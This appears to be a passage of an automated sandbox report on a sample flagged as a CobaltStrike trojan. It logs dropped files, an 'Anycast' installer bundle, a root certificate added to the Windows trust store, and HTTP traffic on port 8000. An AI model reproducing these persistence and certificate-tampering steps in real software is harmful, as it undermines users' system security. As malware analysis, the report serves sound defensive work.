        Source: Binary string: C:\Projects\Anycast\Anycast.Windows.Service\target\release\deps\anycast_service.pdb source: anycast-service.exe, 00000022.00000000.2136854681.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000022.00000002.2141658275.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000000.2148298336.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000002.2149618744.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000000.2151447915.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000002.2167398699.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000002.2305155014.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000000.2166163273.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp
        Source: Binary string: C:\Users\Jason A. Donenfeld\Projects\wintun\Release\arm64\setupapihost.pdb source: wintun.dll.6.dr
        Source: Binary string: D:\nt-driver-builder\wintun-0.14\Release\amd64\driver\wintun.pdbGCTL source: wintun.dll.6.dr
        Source: Binary string: D:\nt-driver-builder\wintun-0.14\Release\arm64\driver\wintun.pdb source: wintun.dll.6.dr
        Source: Binary string: /_/artifacts/obj/System.Collections.Immutable/net461-Release/System.Collections.Immutable.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4464671863.0000000006DB2000.00000002.00000001.01000000.0000001B.sdmp, System.Collections.Immutable.dll.6.dr
        Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4454066671.0000000003772000.00000002.00000001.01000000.00000016.sdmp
        Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/net461-Release/System.Text.Encodings.Web.pdbSHA256I source: Anycast.exe, 0000002B.00000002.4468046219.00000000071F2000.00000002.00000001.01000000.0000001F.sdmp
        Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: System.Security.Permissions.dll.6.dr
        Source: Binary string: C:\Projects\Anycast\Anycast.Windows\Anycast\obj\Release\Anycast.pdb0 source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe.6.dr
        Source: Binary string: /_/artifacts/obj/System.Reflection.Metadata/net461-Release/System.Reflection.Metadata.pdbSHA256[] source: Anycast.exe, 0000002B.00000002.4465512876.0000000006E32000.00000002.00000001.01000000.0000001A.sdmp
        Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: System.ValueTuple.dll.6.dr
        Source: Binary string: C:\BuildAgent\work\da2c3d9512902c54\Tooling\obj\Release\System.Net.Http.Formatting\System.Net.Http.Formatting.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4473569599.000000000CC52000.00000002.00000001.01000000.00000028.sdmp, System.Net.Http.Formatting.dll.6.dr
        Source: Binary string: D:\a\QRCoder\QRCoder\QRCoder\obj\Release\net40\QRCoder.pdbSHA256 P. source: QRCoder.dll.6.dr
        Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4464886117.0000000006DF2000.00000002.00000001.01000000.0000001C.sdmp
        Source: Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4468837667.0000000007232000.00000002.00000001.01000000.0000001E.sdmp
        Source: Binary string: D:\nt-driver-builder\wintun-0.14\Release\amd64\driver\wintun.pdb source: wintun.dll.6.dr
        Source: Binary string: /_/artifacts/obj/System.Reflection.Metadata/net461-Release/System.Reflection.Metadata.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4465512876.0000000006E32000.00000002.00000001.01000000.0000001A.sdmp
        Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256X^. source: Anycast.exe, 0000002B.00000002.4454066671.0000000003772000.00000002.00000001.01000000.00000016.sdmp
        Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/net461-Release/System.Text.Encodings.Web.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4468046219.00000000071F2000.00000002.00000001.01000000.0000001F.sdmp
        Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4469560551.0000000007612000.00000002.00000001.01000000.00000020.sdmp
        Source: Binary string: D:\a\QRCoder\QRCoder\QRCoder.Xaml\obj\Release\net40\QRCoder.Xaml.pdbSHA256o3 source: QRCoder.Xaml.dll.6.dr
        Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdb source: System.Security.Permissions.dll.6.dr
        Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4458477595.0000000005EB2000.00000002.00000001.01000000.00000017.sdmp
        Source: Binary string: /_/artifacts/obj/System.Collections.Immutable/net461-Release/System.Collections.Immutable.pdbSHA256M source: Anycast.exe, 0000002B.00000002.4464671863.0000000006DB2000.00000002.00000001.01000000.0000001B.sdmp, System.Collections.Immutable.dll.6.dr
        Source: Binary string: Hardcodet.NotifyIcon.Wpf.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4466233439.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp
        Source: Binary string: Sentry.pdbSHA2569 source: Anycast.exe, 0000002B.00000002.4458091074.0000000005AE2000.00000002.00000001.01000000.00000015.sdmp
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: Anycast.exe.6.drStatic PE information: 0xEB3DA424 [Mon Jan 24 05:31:16 2095 UTC]
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B8051A00 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,FreeLibrary,WriteFile,CloseHandle,FreeLibrary,0_2_00007FF8B8051A00
        Source: dnscrypt-proxy.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x81ab19
        Source: Anycast.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x16f61a
        Source: Hardcodet.NotifyIcon.Wpf.dll.6.drStatic PE information: real checksum: 0x1e49a should be: 0x21484
        Source: QRCoder.dll.6.drStatic PE information: real checksum: 0x23cae should be: 0x301b8
        Source: UserInfo.dll.6.drStatic PE information: real checksum: 0x0 should be: 0xaaa4
        Source: uninst.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x2ae21
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: real checksum: 0x0 should be: 0x5fb9c
        Source: DotNetChecker.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x202d8
        Source: System.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x82fd
        Source: Anycast.resources.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x6cfb
        Source: Anycast.resources.dll0.6.drStatic PE information: real checksum: 0x0 should be: 0xc1d0
        Source: InstallOptions.dll.6.drStatic PE information: real checksum: 0x0 should be: 0xf13f
        Source: anycast-service.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x50aeb3
        Source: QRCoder.Xaml.dll.6.drStatic PE information: real checksum: 0x9584 should be: 0xe545
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: section name: _RDATA
        Source: vcruntime140.dll.6.drStatic PE information: section name: _RDATA
        Source: msvcp140.dll.6.drStatic PE information: section name: .didat
        Source: dnscrypt-proxy.exe.6.drStatic PE information: section name: .symtab
        Source: wintun.dll.6.drStatic PE information: section name: .didat
        Source: wintun.dll.6.drStatic PE information: section name: _RDATA
        Source: Packet.dll.6.drStatic PE information: section name: _RDATA
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_03772D84 push es; ret 43_2_03772DF4
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0377293D push es; ret 43_2_0377298C
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06FD66C8 push ss; iretd 43_2_06FD66CA
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_017AB178 push eax; mov dword ptr [esp], edx43_2_017AB18C
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_017A36ED push ebx; iretd 43_2_017A36DA
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_017A36B7 push ebx; iretd 43_2_017A36DA
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_017AEB50 push es; ret 43_2_017AEB60
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_017AEF19 push eax; iretd 43_2_017AEF25
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_017AFE41 push es; ret 43_2_017AFE50
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06DA62C1 push es; ret 43_2_06DA62D0
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06DA8EE2 push es; ret 43_2_06DA8EF0
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06DA29A1 pushad ; ret 43_2_06DA29B3
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06DA0900 push es; ret 43_2_06DA0910
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06DA1671 push es; ret 43_2_06DA1680
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E22530 push es; ret 43_2_06E22520
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E22510 push es; ret 43_2_06E22520
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E22392 push es; ret 43_2_06E223A0
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E24181 push es; ret 43_2_06E24190
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E2415F push es; ret 43_2_06E24170
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E21E00 push es; ret 43_2_06E21E10
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E24FFD pushfd ; iretd 43_2_06E25001
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E22820 push es; ret 43_2_06E22830
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E229F8 push esp; iretd 43_2_06E22A01
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_07216780 push es; ret 43_2_07216790
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_07215EE0 push 00000001h; ret 43_2_07215EF6
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0722E810 pushfd ; iretd 43_2_0722E811
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0C3260E0 pushad ; ret 43_2_0C326181
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0C32EFC3 push es; retf 43_2_0C32F002
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0CCC4CD3 push esp; retf 43_2_0CCC4CF2
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0CCC4CA8 push ebx; retf 43_2_0CCC4CD2
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0CCC0543 push cs; retf 43_2_0CCC0552
        Source: Anycast.exe.6.drStatic PE information: section name: .text entropy: 7.5189673591647885
        Source: Hardcodet.NotifyIcon.Wpf.dll.6.drStatic PE information: section name: .text entropy: 7.35597975600909

        Persistence and Installation Behavior

        barindex
        Installs new ROOT certificates
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Collections.Immutable.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\vcruntime140.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Numerics.Vectors.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Reflection.Metadata.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\uninst.exeJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Security.AccessControl.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Threading.Tasks.Extensions.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Local\Temp\nst31D0.tmp\InstallOptions.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\Newtonsoft.Json.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Buffers.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Text.Json.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Drawing.Common.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\Anycast.exeJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\Hardcodet.NotifyIcon.Wpf.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\DotNetChecker.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Local\Temp\nst31D0.tmp\DotNetChecker.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\msvcp140.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Configuration.ConfigurationManager.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Local\Temp\nst31D0.tmp\UserInfo.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Security.Principal.Windows.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\Sentry.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeJump to dropped file
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\A[1].exeJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\Packet.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Local\Temp\nst31D0.tmp\System.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Memory.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Text.Encodings.Web.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\UserInfo.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\zh-TW\Anycast.resources.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\QRCoder.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\QRCoder.Xaml.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\vcruntime140_1.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.ValueTuple.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\wintun.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Net.Http.Formatting.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\zh-CN\Anycast.resources.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\Public\111.exeJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\anycast-service.exeJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\System.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\InstallOptions.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\Anycast\System.Security.Permissions.dllJump to dropped file
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\Public\111.exeJump to dropped file

        Boot Survival

        barindex
        Drops PE files to the user root directory
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\Public\111.exeJump to dropped file
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\dnscrypt-proxy
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnycastJump to behavior
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anycast\Anycast.lnkJump to behavior
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anycast\Website.lnkJump to behavior
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anycast\Uninstall.lnkJump to behavior
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8013240 OpenSCManagerW,GetLastError,RegOpenKeyExA,RegCloseKey,OpenServiceA,QueryServiceStatus,StartServiceW,GetLastError,CloseServiceHandle,GetLastError,CloseServiceHandle,SetLastError,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetProcessHeap,HeapAlloc,GetLastError,SetNamedPipeHandleState,GetLastError,WriteFile,GetLastError,ReadFile,GetLastError,SetLastError,SetLastError,SetLastError,SetLastError,CreateFileA,CreateEventW,GetLastError,DeviceIoControl,GetLastError,CloseHandle,SetLastError,GetLastError,CloseHandle,SetLastError,GetLastError,DeviceIoControl,GetLastError,SetLastError,GetLastError,SetLastError,SetLastError,GetLastError,DeviceIoControl,GetLastError,SetLastError,GetLastError,SetLastError,SetLastError,GetLastError,GetProcessHeap,HeapFree,SetLastError,34_2_00007FF8B8013240

        Hooking and other Techniques for Hiding and Protection

        barindex
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49707
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8012C20 WaitForSingleObject,ReleaseMutex,GetSystemDirectoryW,GetLastError,SetLastError,SetLastError,LoadLibraryW,GetLastError,SetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,ReleaseMutex,34_2_00007FF8B8012C20
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Program Files (x86)\Anycast\Anycast.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\111.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
